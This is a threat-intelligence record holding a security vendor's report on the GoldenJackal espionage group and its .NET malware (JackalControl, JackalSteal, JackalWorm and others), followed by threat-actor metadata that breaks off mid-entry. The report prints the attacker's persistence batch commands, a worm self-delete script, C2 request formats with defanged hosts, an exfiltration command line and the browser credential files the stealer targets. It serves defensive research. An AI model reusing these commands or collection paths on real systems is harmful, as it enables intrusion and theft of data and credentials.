{
	"id": "d234e472-4bdd-45d2-be3f-8d9e4d71b6a1",
	"created_at": "2026-04-06T00:21:47.768896Z",
	"updated_at": "2026-04-10T13:11:25.675408Z",
	"deleted_at": null,
	"sha1_hash": "99f08a2d3b149cfb0a3fde372f77fcfa66f5face",
	"title": "Meet the GoldenJackal APT group. Don’t expect any howls",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 291000,
	"plain_text": "Meet the GoldenJackal APT group. Don’t expect any howls\r\nBy Giampaolo Dedola\r\nPublished: 2023-05-23 · Archived: 2026-04-05 15:03:31 UTC\r\nGoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the\r\nMiddle East and South Asia. Despite the fact that they began their activities years ago, this group is generally\r\nunknown and, as far as we know, has not been publicly described.\r\nWe started monitoring the group in mid-2020 and have observed a constant level of activity that indicates a\r\ncapable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl,\r\nJackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher intended to:\r\ncontrol victim machines\r\nspread across systems using removable drives\r\nexfiltrate certain files from the infected system\r\nsteal credentials\r\ncollect information about the local system\r\ncollect information about users’ web activities\r\ntake screen captures of the desktop\r\nBased on their toolset and the attacker’s behaviour, we believe the actor’s primary motivation is espionage.\r\nInfection vectors\r\nWe have limited visibility on their infection vectors, but during our investigations, we observed the usage of fake\r\nSkype installers and malicious Word documents.\r\nThe fake Skype installer was a .NET executable file named skype32.exe that was approximately 400 MB in size.\r\nIt was a dropper containing two resources: the JackalControl Trojan and a legitimate Skype for business\r\nstandalone installer. 
This tool was used in 2020.\r\nThe other known infection vector was a malicious document that uses the remote template injection technique to\r\ndownload a malicious HTML page, which exploits the Follina vulnerability.\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 1 of 23\n\nMalicious document – first page\r\nThe document was named “Gallery of Officers Who Have Received National And Foreign Awards.docx” and\r\nappears as a legitimate circular distributed to collect information about officers decorated by Pakistan’s\r\ngovernment. It’s worth noting that the first description of the Follina vulnerability was published on May 29, 2022\r\nand this document appears to have been modified on June 1, two days after publication, and was first detected on\r\nJune 2.\r\nThe document was configured to load an external object from a legitimate and compromised website:\r\nhxxps://www.pak-developers[.]net/internal_data/templates/template.html!\r\nCode snippet used to load the remote resource\r\nThe remote webpage is a modified version of a public “Proof of Concept” to exploit the Follina vulnerability. The\r\noriginal PoC is available on GitHub. The attacker replaced the IT_BrowseForFile variable value with the\r\nfollowing:\r\nCode snippet used to exploit the Follina vulnerability\r\nThe decoded string is:\r\nDecoded script\r\nThe exploit downloads and executes an executable file hosted on the legitimate compromised website, and stores\r\nit in the following path: “%Temp%\\GoogleUpdateSetup.exe”. The downloaded file is the JackalControl malware.\r\nIn other cases, we do not have a real infection vector, but we observed a system compromised during lateral\r\nmovements. 
Specifically, we observed the attacker using the psexec utility to start a malicious batch script.\r\ncmd /c \"c:\\windows\\temp\\install.bat \u003e c:\\windows\\temp\\output.txt\"\r\nThe batch script performs a variety of actions, such as installing Microsoft .Net Framework 4, infecting the system\r\nwith the JackalControl Trojan, and collecting information about the system.\r\n$temp\\\\dnf4.exe /q /norestart\r\ntasklist\r\nsc qc \"WEvMngS\"\r\nsc stop \"WEvMngS\"\r\nsc delete \"WEvMngS\"\r\nsc create \"WEvMngS\" binpath= \"\\\"$windir\\WEvMngS.exe\\\" /1\" displayname= \"Windows Event Manager\" type= own start= auto\"\r\nsc description \"WEvMngS\" \"Provides event-related methods that register routed events.\"\r\nsc start \"WEvMngS\"\r\nschtasks /delete /f /tn \"\\Microsoft\\Windows\\Diagnosis\\Event Manager\"\r\nschtasks /create /f /tn \"\\Microsoft\\Windows\\Diagnosis\\Event Manager\" /xml \"$temp\\\\sch.xml\" /ru \"NT AUTHORITY\\SYSTEM\"\r\nsc qc \"WEvMngS\"\r\nschtasks /query /v /fo list /tn \"\\Microsoft\\Windows\\Diagnosis\\Event Manager\"\r\ntasklist\r\nnetstat -aon\r\nping -n 1 google.com\r\nipconfig /displaydns\r\nnetsh winhttp show proxy\r\nreg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v\r\nJackalControl\r\nThis is a Trojan that allows the attackers to remotely control the target machine through a set of predefined and\r\nsupported commands. 
These are received via an HTTPS communication channel facilitated between the malware\r\nand the C2 servers, and can instruct the implant to conduct any of the following operations:\r\nExecute an arbitrary program with provided arguments\r\nDownload arbitrary files to the local file system\r\nUpload arbitrary files from the local file system\r\nDuring the last few years, the attackers updated this tool multiple times and we observed multiple variants. We are\r\ngoing to describe the latest version, which was observed in January 2023\r\n(8C1070F188AE87FBA1148A3D791F2523).\r\nThe Trojan is an executable file that can be started as a standard program or as a Windows service.\r\nIt expects an argument, which can be equal to one of the following values:\r\n/0 : run as a standard program and contact the C2 servers only once\r\n/1 : run as a standard program and contact the C2 servers periodically\r\n/2 : run as a Windows service\r\nThe malware arguments and the related malware behavior change according to the variants. Some variants offer\r\nonly two arguments:\r\n/0 run as a standard program\r\n/1 run as a Windows service\r\nOther variants can install themselves with different persistence mechanisms. 
The malware’s execution flow is\r\ndetermined by the arguments provided in the command line with which it is run.\r\n/h0: will cause the malware to gain persistence by creating a Windows scheduled task.\r\n/h1: will cause the malware to gain persistence by creating a corresponding registry run key.\r\n/h2: will cause the malware to gain persistence by creating a Windows service.\r\n/r0: run as standard process (this argument is specified by the Windows scheduled task).\r\n/r1: run as standard process (this argument is specified by the generated registry run key value).\r\n/r2: run as a service (this argument is specified by the created Windows service).\r\nOver the years the attackers have distributed different variants: some include code to maintain persistence, others\r\nwere configured to run without infecting the system; and the infection procedure is usually performed by other\r\ncomponents, such as the batch script mentioned above.\r\nThe malware starts its activities by generating a BOT_ID that is a unique value used to identify the compromised\r\nsystem. This value is derived from several other host-based values:\r\nThe UUID value obtained from the following WMI query:\r\nselect * from win32_computersystemproduct\r\nThe machine GUID obtained from the following registry key:\r\nselect * from win32_computersystemproduct\r\nThe list of attached drives, obtained from another WMI query, which in turn allows them to determine the\r\n‘SerialNumber’ of ‘PHYSICALDRIVE0’:\r\nselect * from win32_diskdrive\r\nThe collected information is concatenated together in a byte array and then hashed with MD5, which is used as a\r\nseed for the creation of the BOT_ID. The algorithm used for the generation of the latter simply sums every two\r\nconsecutive bytes from the resulting MD5 hash and places the resulting byte (modulus 256) as a single byte of the\r\nfinal BOT_ID. 
This logic is described in the code snippet below, taken from the malware.\r\nCode snippet used to generate the BOT_ID\r\nThe resulting BOT_ID is used also to initialize the DES key and IV, which are then used to encrypt\r\ncommunication with the C2.\r\nThe malware communicates using HTTP POST requests where data arguments will be carried in encoded form as\r\npart of the request’s body. The overall request structure will then appear as follows:\r\nPOST /wp-includes/class-wp-network-statistics.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nContent-Type: multipart/form-data; boundary=----2c0272b325864985abf2677460a9b07a\r\nAccept-Language: en-GB,en;q=0.5\r\nUpgrade-Insecure-Requests: 1\r\nCache-Control: max-age=0, no-cache\r\nPragma: no-cache\r\nHost: finasteridehair[.]com\r\nContent-Length: 154\r\nExpect: 100-continue\r\n------2c0272b325864985abf2677460a9b07a\r\nContent-Disposition: form-data; name=\"adv\"\r\n%ENCODED_DATA%\r\n------2c0272b325864985abf2677460a9b07a\r\nA valid response should in turn be formed in the following way:\r\n\u003c!-- DEBUGDATA::%ENCODED_DATA% --\u003e\r\nThe response is decoded with base64: the resulting payload is an array of strings, where the used delimiter is the\r\nstandard Windows new line sequence – “\\r\\n”. Each line is decoded again with base64, decrypted with DES, and\r\ndecompressed with the GZIP algorithm.\r\nEach command has the following structure:\r\nCommand structure\r\nThe command type must be equal to one of the following codes:\r\nCommand Description\r\n00\r\nExecute – Execute an arbitrary program with the specified arguments. 
If the attacker sets the\r\nNoWait flag to False, the malware redirects the process output, reads the data and forwards\r\nthem to the C2.\r\n01 Download – Read a file from the local system and upload it to the server.\r\n02 Upload – Save received data to the local system using the filepath specified by the attacker.\r\nThe Command Data field is intended to carry information on the command arguments and has a different structure\r\nfor each action type, as specified below:\r\nThe command results are usually composed into a message that also includes the values of the underlying\r\ncommand type and command ID, which uniquely identifies an instance of a command issued to the malware. The\r\nthree values are compressed with GZIP, encrypted with DES, and encoded with base64.\r\nThe resulting payload is concatenated with the BOT_ID using the “|” char, encoded again with base64, after which\r\nit gets uploaded to the remote server using the aforementioned POST request format.\r\nInstaller mode\r\nSome variants can infect the system, creating a copy of the malware in a specific location and guaranteeing its\r\npersistence.\r\nThe malware location is selected with a specific procedure. It enumerates all subdirectories in\r\nCommonApplicationData and randomly selects one to which its copy will be saved. 
The generated file name will\r\nbe suffixed with the subdirectory’s names and appended with another static value, Launcher.exe, as outlined\r\nbelow:\r\nSelected directory: C:\\ProgramData\\Windows App Certification Kit Launcher\r\nMalware copy: \"C:\\ProgramData\\Windows App Certification Kit\r\nLauncher\\WindowsAppCertificationKitLauncher.exe\"\r\nIf the operation succeeds, it also changes the new file timestamp and makes it the same as that of the selected\r\nsubdirectory.\r\nIf the operation fails, it randomly selects another directory and tries again to copy the malware.\r\nIf the operation fails with all subdirectories, it tries to use a list of hard-coded directory names:\r\nGoogle\r\nViber\r\nAdGuard\r\nWinZip\r\nWinRAR\r\nAdobe\r\nCyberLink\r\nIntel\r\nIf all the previous attempts fail, it tries to use the same procedure in the following locations:\r\nApplicationData\r\nLocalApplicationData\r\nTemp\r\nPersistence\r\nThe malware’s persistence is usually guaranteed with one of the following mechanisms:\r\nService installation\r\nCreation of a new Windows registry key value\r\nCreation of a new scheduled task.\r\nThe service is usually installed by the malware with the execution of the Windows sc.exe utility.\r\nsc create \"[MALWARE_NAME_NO_EXT]\" binpath= \"[MALWARE_FULL_PATH]\" /[ARGUMENT]\" displayname= \"WORKPATH\" type= own start= auto\r\nsc description \"[MALWARE_NAME_NO_EXT]\" \"This service keeps your installation up to date with the latest enhancements and security fixes.\"\r\nsc start \"[MALWARE_NAME_NO_EXT]\"\r\nThe registry value is equal to the copied malware file name, without the extension, and is stored under the\r\nfollowing key:\r\nKey: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue name: \"[MALWARE_NAME_NO_EXT]\"\r\nValue data: \"[MALWARE_FULL_PATH] [ARGUMENT]\"\r\nThe scheduled task is created using a hard-coded XML template that is modified at 
runtime and dropped in the file\r\nsystem using the same malware file path, but with a different extension, .xml instead of .exe.\r\nThe generated XML file is then used with the Windows schtasks.exe utility to create the task.\r\nFor example:\r\nschtasks.exe /create /f /tn \"Adobe Update\" /xml \"C:\\ProgramData\\Adobe\\adobeupd.xml\"\r\nThe task and service description change according to the variant.\r\nJackalSteal\r\nJackalSteal is another implant usually deployed on a few compromised machines that is used to find files of\r\ninterest on the target’s system and exfiltrate them to the C2 server.\r\nThis tool can be used to monitor removable USB drives, remote shares, and all logical drives in the targeted\r\nsystem. The malware can work as a standard process or as a service. It cannot maintain persistence, so it must be\r\ninstalled by another component.\r\nJackalSteal starts its execution by parsing the arguments.\r\nOption Description\r\n-n a unique identifier value for the configured profile\r\n-p directory path to inspect\r\n-s maximum size of requested files\r\n-d number of days since the last write of the requested files\r\n-m a comma-separated list of string masks to look for using a regular expression within the configured\r\ndirectory\r\n-w time interval in seconds between consecutive directory scans for the configured profile\r\n-e exclude path from the scanning activities\r\n/0 run as standard process\r\n/1 run as a service\r\nThese options allow the attacker to specify the ‘profile’, which defines what files are of interest to the attackers.\r\nThe profile consists of an ID and a list of patterns. 
Each pattern contains a list of options with the following\r\nproperties:\r\nProperty Description\r\nPath target paths\r\ncredentials user and password used to access a remote share\r\nMasks string with wildcard and mask characters that can be used to match any set of files using a\r\nregular expression\r\nMaxSize maximum size of a file\r\nDays the number of days since the file was last written\r\nInterval the time interval between two consecutive path scans\r\nExclude paths that must be excluded during scanning activities\r\nThe command used to configure the JackalSteal component is as follows:\r\n%TEMP%\\\\setup01.exe -p all -p usb -e Windows -e \\\"Program Files*\\\" -e ProgramData -e Users\\\\*\\\\AppData -e *\\\\AppData -s 15 -d 30 -w 3600 -m *.doc,*.docx,*.pdf,*.jpg,*.png,*.tif,*.tiff,*.txt,*.ppt,*.pptx,*.xls,*.xlsx -n 48df302a44c392eb\r\nThe unique identifier “-n” is usually the same BOT_ID generated by the JackalControl Trojan.\r\nAfter argument processing, the malware serializes the data in an XML, encrypts them with DES using a key\r\ngenerated from the ID passed with the “-n” option and stores the resulting payload in the following location:\r\n“%ApplicationData%\\SNMP\\cache\\%Filename%”, where %Filename% is a GUID generated from an MD5 of the\r\nunique identifier specified by the attacker.\r\nThe malware is usually executed with the “/0” or “/1” option and the “-n” option, which is used to load the\r\nobtained profile ID. In the second case, it loads the profile from the previously mentioned location and it starts the\r\n‘Watchers’.\r\nA Watcher is an object defined in a class with the same name that runs in a different thread and scans the location\r\naccording to the specified options. 
The pattern could represent:\r\na simple path in the local filesystem;\r\na path on a remote share;\r\nconstant string all;\r\nconstant string usb.\r\nWhen the pattern equals ‘all’, the malware enumerates all logical drives, and for each one it creates a new Watcher\r\nobject. When the pattern is ‘usb’, it listens for system events corresponding to the action of creating a new\r\nremovable drive on the system. When a new drive is detected, it creates a new Watcher object.\r\nEvery time a new Watcher is added, the malware notifies the log of the event and sends the information to the\r\nremote C2 using HTTP Post requests.\r\nThe log is created using the following string as a template:\r\nPath: {0}{1}\\r\\nMasks: {2}\\r\\nExclude: {3}\\r\\nDays: {4}\\r\\nMaxSize: {5}\\r\\nInterval: {6}\r\nAnd is uploaded inside an encrypted payload that contains the following information:\r\n|\u003cAES_Key,AES_IV\u003e\u003cAgent_id\\\\%yyyyMMddHHmmssfff%.log\u003e\u003cLog content\u003e|\r\nThe AES_Key and AES_IV are generated for each request and are encrypted with the RSA algorithm using a key\r\nembedded in the code. The resulting payload is also compressed with the GZIP algorithm.\r\nThe Agent_id\\\\Log_path.log and the Log content data are encrypted with the AES algorithm and compressed with\r\nGZIP.\r\nThe Watcher objects are responsible for scanning activities. When a Watcher starts, it enumerates all files in the\r\ndirectory and its subdirectories. The scanner can also resolve the .lnk links. 
When the scanner detects a file that\r\nmatches the defined properties (mask, days, max size, not in exclusions), it calculates the file content hash, checks\r\nif the resulting value is present in a hash table stored in the local cache directory and adds the value if not present.\r\nWhen a new file is detected, the malware uploads the file and the related filepath inside an encrypted payload\r\nusing the same logic described above.\r\nIn this case, the encrypted payload contains the following information:\r\n|\u003cAES_Key,AES_IV\u003e\u003cAgent_id\\\\Local_file_path\u003e\u003cFile content\u003e|\r\nThe Agent_id\\\\Local_file_path and the File content data are encrypted with the AES algorithm and compressed\r\nwith GZIP.\r\nJackalWorm\r\nThis worm was developed to spread and infect systems using removable USB drives. The program was designed\r\nas a flexible tool that can be used to infect systems with any malware.\r\nIts behavior changes according to the parent process.\r\nWhen the malware is working on a system that is already infected and the parent process is taskeng.exe or\r\nservices.exe:\r\n1. Monitors removable USB drives\r\n2. When a device is attached, hides the last-modified directory and replaces it with a copy of the worm\r\nThe code used to monitor removable USB drives is the same one observed in JackalSteal. It creates a\r\nManagementEventWatcher object, which allows it to subscribe to event notifications that correspond to a given\r\nWQL query and the issuing of a callback upon their interception. The query used by the malware instructs the\r\nsystem to check for a logical removable disk creation event every five seconds:\r\nselect * from __InstanceCreationEvent within 5 where TargetInstance ISA 'Win32_LogicalDisk' and TargetInstance.DriveType = 2\r\nWhen the malware detects a removable USB storage device, it will copy itself onto it. 
The path it will copy to is\r\ndetermined by listing all directories and selecting the one that was modified last. It will create a copy of itself on\r\nthe drive root using the same directory name and change the directory’s attribute to “hidden”. This will result in\r\nthe actual directory being hidden and replaced with a copy of the malware with the directory name. Moreover,\r\nJackalWorm uses an icon mimicking a Windows directory, tricking the user into executing the malware when\r\ntrying to access a directory.\r\nIn the following example, the removable drive “E:” was infected by the malware, which copied itself as\r\nFolder1.exe and changed the attributes of Folder1 to hide it:\r\nInfected device\nWhen the malware starts on a clean system, the parent process is explorer.exe and the file is located on a\nremovable drive, the behavior is as follows:\n1. Opens the hidden directory\n2. Performs the actions specified in the configuration files\n3. Infects the system with the worm\nThe configuration files are embedded resources that contain XML data that can be used to instruct the worm to\nperform some actions:\nDrop a program and guarantee its persistence with a scheduled task\nDrop a program and execute it with the specified arguments\nExecute an existing program with the specified arguments\nA valid configuration file looks like this:\nIn this case, the worm was configured to install the PE file stored in another resource “rcdata02”, save it with the\nextension .exe and create a scheduled task to run it every 15 minutes.\nOther valid examples are:\nDrops the PE file stored in another resource “rcdata02” in “%TEMP%\\test.exe” and executes it.\nExecutes the program “%WINDIR%\\system32\\ping.exe” with the argument “1.1.1.1”.\nIn our investigations, we observed only the first example and the malware was configured to install the\nJackalControl Trojan.\nThe installation procedure selects the malware location in much the same way as the procedure described in the\nsection above. It differs from the other one because it enumerates the subdirectories in CommonAppData only and\ncopies the file using the subdirectory’s names concatenated with another static value, upd.exe.\nIf it fails, it tries with a list of hard-coded directory names, which is a bit different from the procedure described\nabove.\nGoogle\nMozilla\nAdobe\nIntel\n[Random GUID]\nThe worm maintains its persistence by creating a scheduled task with a hard-coded XML template dynamically\nmodified at runtime. Once installed, the worm deletes itself from the removable drive by using a batch script. 
The\nscript is dropped in the local Temp directory with a random name:\n@echo off\n@chcp 65001\u003enul\n:check\n@tasklist | findstr /i \"%executingFilename%\" \u003enul\n@if %errorlevel%==0 goto check\n@del /f /q /a h \"%executingPath%\"\n@del /f /q \"%Temp%\\%randomname%.bat\"\nFuture removable drives that are attached will be re-infected with JackalWorm.\nIt is also worth mentioning that this tool seems to be under development. We deduced this by analyzing the\nembedded .NET resources of the file 5DE309466B2163958C2E12C7B02D8384. Their size is 193973 bytes,\nwhich is much bigger than their actual content:\nRcdata01 – XML config – Size: 67 bytes\nRcdata02 – JackalControl Trojan – Size: 27136 bytes\nIt means there are 166770 bytes of unknown data. Most of them are part of the legitimate notepad.exe Windows\nutility, and specifically, the first 0x6A30 bytes were overwritten. After the legitimate notepad.exe image, we found\nalso the following XML configurations:\nThe first XML shows a new type value: ‘scheduler’, which is not specified in the code. The second XML shows\nthat this specific resource was used for testing purposes and the attacker was trying to run cmd.exe to write the\nword “TEST” in a text file in the desktop: %USERPROFILE%\\Desktop\\test.txt.\nJackalPerInfo\nThis malware was developed to collect information about the compromised system, as well as a specific set of\nfiles that could potentially be used to retrieve stored credentials and the user’s web activities. The attacker named\nit “perinfo”, a contraction of the program’s main class name PersonalInfoContainer.\nIts behaviour changes according to the number of arguments provided during execution. Specifically, when\nexecuted with only one argument, the malware collects a predefined set of information and stores it in a binary file\ncompressed with GZIP. The filename is specified in the argument provided. 
When executed with two arguments,\nthe malware uses the first argument to load a previously generated binary file and extract all the information to a\ndirectory specified by the second argument.\nBy default, the program should be executed with one argument. Once it is executed, the malware starts collecting\ninformation about the system using a specific function, GetSysInfo, which collects the following information:\nComputer name: %s\nOS version: %S\nDomain: %S\nUser: %S\nLocal time: %s\nInterfaces:\n%Interface Name%\r\n    DESC:\r\n    TYPE:\r\n    MAC:\r\n    IP:\r\n    GW:\r\n    DNS:\r\n    DHCP:\r\n    DOMAIN:\r\nRemote IP:\r\nCurrent directory:\r\nDrives:\r\n    C:\\ Fixed\r\n    D:\\ CDRom\r\n...\r\nApplications:\r\n    %Installed Application1%\r\n    %Installed Application2%\r\n...\r\nProcesses:\r\n    %Process Name 1%\r\n        Desc: %s\r\n        Name: %s\r\n        Path: %s\r\n    %Process Name 2%\r\n...\r\nThis specific function was also observed in the first JackalControl variants, but was removed from newer variants.\r\nThe malware continues its operation by enumerating the logical drives on the system; and for each one it\r\nenumerates the files in the root path. The collected info includes the last write time, the filename, and the file size.\r\nIt then enumerates the Users directory in the system drive, usually C:\\Users\\. 
For each user, it enumerates the\r\ncontent of the following directories:\r\nDesktop\r\nDocuments\r\nDownloads\r\nAppData\\Roaming\\Microsoft\\Windows\\Recent\r\nIt tries also to acquire the following files:\r\nDesktop\\*.txt\r\nDocuments\\*.txt\r\nAppData\\Local\\Microsoft\\Windows\\WebCache\\*.log\r\nAppData\\Roaming\\Microsoft\\Windows\\Cookies\\*.txt\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Bookmarks\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Cookies\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\History\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Login Data\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Shortcuts\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Web Data\r\nAppData\\Roaming\\Opera\\Opera\\*\\bookmarks.adr\r\nAppData\\Roaming\\Opera\\Opera\\*\\global_history.dat\r\nAppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*\\places.sqlite\r\nAppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\r\nAppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*\\formhistory.sqlite\r\nThe malware attempts to steal credentials stored in the victim’s browser databases, as well as other information\r\nsuch as cookies that could be used to gain access to web services.\r\nFinally, it serializes the collected information to a binary format, compresses all the data with the GZIP algorithm,\r\nand stores everything in the file specified with the first argument provided by the attacker.\r\nJackalScreenWatcher\r\nThis tool is used to collect screenshots of the victim’s desktop and sends the pictures to a remote, hard-coded C2\r\nserver:\r\nhxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php\r\nThis specific webpage was also used as a C2 for the JackalSteal component, indicating that the tools are probably\r\npart of a unique framework.\r\nThe malware can handle some arguments that are optional and can be provided as input:\r\n-r resolution ratio (default 1.0)\r\n-i interval (default 10 seconds)\r\n-n specify a custom agent id. By default, this value is equal to: %Hostname%\\%Username%\r\nThe program’s primary function involves running a thread that scans all displays on the system, checking their\r\ndimensions. It then starts an infinite loop, periodically checking if the user is active on the system. Whenever the\r\nmalware detects user activity, it captures a screenshot and sends it to the remote server.\r\nUser activity is detected by monitoring the cursor’s position and checking if it has changed since the last recorded\r\nposition. After uploading a screenshot, it waits for a specified interval before restarting the loop.\r\nThe screenshots are uploaded inside an encrypted payload using HTTP Post requests.\r\nThe encrypted payload is similar to that used by JackalSteal and contains the following information:\r\n|\u003cAES_Key,AES_IV\u003e\u003cRemote filename\u003e\u003cScreenshot\u003e|\r\nAES_Key and AES_IV are encrypted with the RSA algorithm using a key embedded in the code. The resulting\r\npayload is also compressed with the GZIP algorithm.\r\nThe Remote filename and Screenshot data are encrypted with the AES algorithm and compressed with GZIP. The\r\nRSA key is the same as that observed in other JackalSteal components.\r\nInfrastructure\r\nGoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-\r\nrelated logic. We believe the attackers upload a malicious PHP file that is used as a relay to forward web requests\r\nto another backbone C2 server.\r\nWe don’t have any evidence of the vulnerabilities used to compromise the sites. However, we did observe that\nmany of the websites were using obsolete versions of WordPress and some had also been defaced or infected with\npreviously uploaded web shells, likely as a result of low-key hacktivist or cybercriminal activity. 
For this reason,\nwe assess that the vulnerabilities used to breach these websites are known ones rather than 0-days.\nThe remote webpage usually replies with a fake “Not Found” page. The HTTP response status code is “200”, but\nthe HTTP body shows a “Not found” webpage.\n\n404 Not Found\n\n# Not Found\n\nThe requested URL %FILE PATH% was not found on this server.\n\n---\n%SERVER%\n\nIn specific cases, the attacker provides a valid response with a list of commands. In those cases, the previous body\nis followed by a long list of standard Windows new line sequences – “\\r\\n” – and finally the previously mentioned\ndelimiter:\nVictims\nOver the years, we have observed a limited number of attacks against government and diplomatic entities in the\nMiddle East and South Asia. We observed victims in: Afghanistan, Azerbaijan, Iran, Iraq, Pakistan and Turkey.\nGeography of victims\r\nAttribution\r\nWe are unable to link GoldenJackal to any known actor.\r\nDuring our investigations, we observed some similarities between GoldenJackal and Turla. Specifically, we\r\nnoticed a code similarity in the victim UID generation algorithm that overlaps somewhat with that used by\r\nKazuar.\r\nSpecifically, Kazuar gets the MD5 hash of a predefined string and then XORs it with a four-byte unique “seed”\r\nfrom the machine. 
The seed is obtained by fetching the serial number of the volume where the operating system is\r\ninstalled.\r\npublic static Guid md5_plus_xor(string string_0) {\r\n  byte[] bytes = BitConverter.GetBytes(parameter_class.unique_pc_identifier);\r\n  byte[] array = MD5.Create().ComputeHash(get_bytes_wrapper(string_0));\r\n  for (int i = 0; i \u003c array.Length; i++) {\r\n    byte[] array2 = array;\r\n    int num = i;\r\n    array2[num] ^= bytes[i % bytes.Length];\r\n  }\r\n  return new Guid(array);\r\n}\r\nJackalControl uses an MD5+SHIFT algorithm. It collects a set of information from the machine, including the\r\nserial number of the volume where the operating system is installed, to generate a unique seed with the MD5\r\nalgorithm. Then it sums every two consecutive bytes of the resulting MD5 hash, and the resulting bytes\r\n(modulo 256) form the sequence that constructs the final BOT_ID.\r\nCode snippet used to generate the BOT_ID\r\nMoreover, the use of tools developed in .NET and of compromised WordPress websites as C2 is a common Turla\r\nTTP.\r\nLast but not least, the groups share an interest in the same targets, and in one specific case we observed that a\r\nvictim machine was infected with a Turla artifact two months before the GoldenJackal infection.\r\nDespite these similarities, we assessed with low confidence that there is a connection between GoldenJackal and\r\nTurla, since none of these similarities is unique to either threat actor. The use of compromised WordPress websites is not a\r\nunique TTP. This technique was also observed in activity by other groups such as BlackShadow, another APT\r\nactive in the Middle East that uses .NET malware. The code similarities are related to a single function in a .NET\r\nprogram that could be easily copied with a decompiler. It is possible that GoldenJackal used that algorithm as a\r\nfalse flag. 
Another hypothesis is that the developers behind JackalControl were inspired by Turla and decided to\r\nreplicate the UID generation algorithm. Finally, the shared interest in the same targets is easily explained by the\r\nfact that the victims are high-profile targets that could be considered interesting by different actors.\r\nConclusions\r\nGoldenJackal is an interesting APT actor that tries to keep a low profile. Despite its long-term activities, which are\r\nbelieved to have started in June 2019, this group and the related samples are still generally unknown.\r\nThe group is probably trying to reduce its visibility by limiting the number of victims. According to our telemetry,\r\nthe number of targets is very low and most of them were related to government or diplomatic entities. Moreover,\r\nsome of the samples were deployed only on systems that were not protected by Kaspersky during the infection\r\nphase. This may indicate that the actor is trying to protect some of its tools and avoid specific security solutions.\r\nTheir toolkit seems to be under development – the number of variants shows that they are still investing in it. The\r\nlatest malware, JackalWorm, appeared in the second half of 2022 and appears to still be in the testing phase. This\r\ntool was unexpected because in previous years the attacks were limited to a small group of high-profile entities,\r\nand a tool like JackalWorm is probably difficult to bind and can easily get out of control.\r\nMore information about GoldenJackal, including IoCs and YARA rules, is available to customers of the\r\nKaspersky Intelligence Reporting Service. 
Contact: intelreports@kaspersky.com.\r\nIndicators of compromise\r\nSource: https://securelist.com/goldenjackal-apt-group/109677/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/goldenjackal-apt-group/109677/"
	],
	"report_names": [
		"109677"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a8356cf9-e9d6-4585-8ccf-d30d3efe142b",
			"created_at": "2023-06-23T02:04:34.262059Z",
			"updated_at": "2026-04-10T02:00:04.711064Z",
			"deleted_at": null,
			"main_name": "GoldenJackal",
			"aliases": [],
			"source_name": "ETDA:GoldenJackal",
			"tools": [
				"JackalControl",
				"JackalPerInfo",
				"JackalScreenWatcher",
				"JackalSteal",
				"JackalWorm"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "21e01940-3851-417f-9e90-1a4a2da07033",
			"created_at": "2022-10-25T16:07:23.299369Z",
			"updated_at": "2026-04-10T02:00:04.527895Z",
			"deleted_at": null,
			"main_name": "Agrius",
			"aliases": [
				"AMERICIUM",
				"Agonizing Serpens",
				"BlackShadow",
				"DEV-0227",
				"Pink Sandstorm",
				"SharpBoys",
				"Spectral Kitten"
			],
			"source_name": "ETDA:Agrius",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agrius",
				"BFG Agonizer",
				"BFG Agonizer Wiper",
				"DEADWOOD",
				"DETBOSIT",
				"Detbosit",
				"IPsec Helper",
				"Moneybird",
				"MultiLayer Wiper",
				"PW",
				"PartialWasher",
				"PartialWasher Wiper",
				"SQLShred",
				"Sqlextractor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d1dcfc37-1f9b-4acd-a023-25153f183c2e",
